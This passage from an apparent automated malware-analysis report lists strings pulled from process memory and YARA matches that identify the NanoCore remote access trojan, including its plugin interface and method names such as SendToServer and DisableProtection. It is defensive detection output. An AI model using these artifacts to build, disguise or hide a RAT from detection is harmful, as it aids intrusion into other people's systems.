ttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: ihgsvw.exe, 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Yara detected Nanocore RAT
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
